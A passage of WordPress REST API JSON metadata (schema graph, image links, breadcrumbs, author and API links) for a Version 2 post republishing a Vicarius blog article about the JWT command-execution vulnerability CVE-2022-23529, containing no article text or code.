2","isPartOf":{"@id":"https:\/\/version-2.com\/zh\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max","datePublished":"2023-01-18T09:27:53+00:00","dateModified":"2024-09-13T08:31:49+00:00","breadcrumb":{"@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#breadcrumb"},"inLanguage":"zh-HK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529"]}]},{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage","url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max","contentUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max"},{"@type":"BreadcrumbList","@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/version-2.com\/"},{"@type":"ListItem","position":2,"name":"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529"}]},{"@type":"WebSite","@id":"https:\/\/version-2.com\/zh\/#website","url":"https:\/\/version-2.com\/zh\/","name":"Version 2","description":"","publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/version-2.com\/zh\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-HK"},{"@type":"Organization","@id":"https:\/\/version-2.com\/zh\/#organization","name":"Version 2","url":"https:\/\/version-2.com\/zh\/","logo":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","contentUrl":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","width":1795,"height":335,"caption":"Version 2"},"image":{"@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/103ffe36f7fd34a1cc126a30431b94d8","name":"versionpan","image":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","caption":"versionpan"},"url":"https:\/\/version-2.com\/zh\/author\/versionpan\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbQRKm-fUa","post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/61142","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/users\/148637484"}],"replies":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/comments?post=61142"}],"version-history":[{"count":6,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/61142\/revisions"}],"predecessor-version":[{"id":69413,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/61142\/revisions\/69413"}],"wp:attachment":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/media?parent=61142"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/categories?post=61142"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/tags?post=61142"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}